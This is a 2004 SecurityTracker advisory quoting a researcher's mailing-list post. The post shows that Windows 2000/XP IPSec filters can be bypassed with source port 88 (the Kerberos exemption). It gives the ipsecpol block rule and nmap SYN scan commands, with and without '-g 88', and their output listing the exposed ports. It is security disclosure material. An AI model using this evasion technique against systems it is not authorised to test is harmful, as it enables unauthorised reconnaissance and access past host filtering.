Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users
|
|
SecurityTracker Alert ID: 1010314
|
|
SecurityTracker URL: http://securitytracker.com/id?1010314
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 27 2004
|
Impact: Host/resource access via network
|
Exploit Included: Yes
Vendor Confirmed: Yes
|
Description: A vulnerability was reported in Microsoft Windows 2000 and XP in the default IPSec filtering configuration. A remote user can bypass the filter and access ports on the system.
JJ Gray reported that a remote user can bypass the IPSec filters by sending a packet with a source port of 88.
The IPSec filters
are admittedly not intended as a firewall feature according to Microsoft. Microsoft acknowledges this behavior in the following
article:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;253169
|
Impact: A remote user can bypass the IPSec filtering to gain access to arbitrary ports on the system.
|
Solution: No solution was available at the time of this entry.
[Editor's note: The vendor has previously indicated that the IPSec filtering feature is not intended as a host-based firewall.]
|
Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)
|
Cause: Configuration error
|
Underlying OS: Windows (2000), Windows (XP)
|
Reported By: JJ Gray <jj@irmplc.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed May 19 2004 - 16:48:26 CDT
From: JJ Gray <jj@irmplc.com>
Subject: Win2K & XP IPSEC Filtering bypass
|
Hi folks,
As a result of a recent engagement looking at Windows host hardening, I
came across this little trick and thought it might be useful at some point.
The Microsoft IPSEC filters used by Windows 2000 & XP can be bypassed by
choosing a source port of 88 (Kerberos).
First off, Microsoft themselves state that IPSEC filters are not designed as
a full featured host based firewall [1] and it is already known that certain
types of traffic are exempt from IPSEC filters [2] and they can be
summarised as:
* Broadcast
* Multicast
* RSVP
* IKE
* Kerberos
In a Microsoft support note [2] there is the line:
"The Kerberos exemption is basically this: If a packet is TCP or UDP and has
a source or destination port = 88, permit."
The test host here has a "block all" rule created using:
ipsecpol.exe -x -w REG -p "The Black Knight" -r "NoneShallPass" -n BLOCK -f
0=*::*
Normal Nmap scan:
# nmap -sS -v -v -P0 --initial_rtt_timeout 10 --max_rtt_timeout 20
172.25.0.14
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
The SYN Stealth Scan took 7 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1658 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
88/tcp closed kerberos-sec
Nmap run completed -- 1 IP address (1 host up) scanned in 7.017 seconds
Port 88 closed is the hint, Nmap again using this source port:
# nmap -sS -v -v -P0 -g 88 --initial_rtt_timeout 10 --max_rtt_timeout 20
172.25.0.14
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
Adding open port 445/tcp
Adding open port 135/tcp
Adding open port 139/tcp
Adding open port 1433/tcp
Adding open port 1027/tcp
Adding open port 1025/tcp
The SYN Stealth Scan took 0 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1653 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1433/tcp open ms-sql-s
Nmap run completed -- 1 IP address (1 host up) scanned in 0.367 seconds
As can be seen, the IPSEC filters are bypassed. Although not designed as a
host based firewall, IPSEC filters are being used as such, particularly to
block popular attacked ports such as NETBIOS, CIFS and SQL, perhaps as
[temporary] worm mitigation.
In Windows 2003 all of these default exemptions have been removed with the
exception of IKE [1] and I believe that this may be incorporated into
earlier Windows versions at some point.
Cheers,
JJ
[1] http://support.microsoft.com/default.aspx?scid=kb;EN-US;810207
[2] http://support.microsoft.com/default.aspx?scid=kb;EN-US;253169
|
|
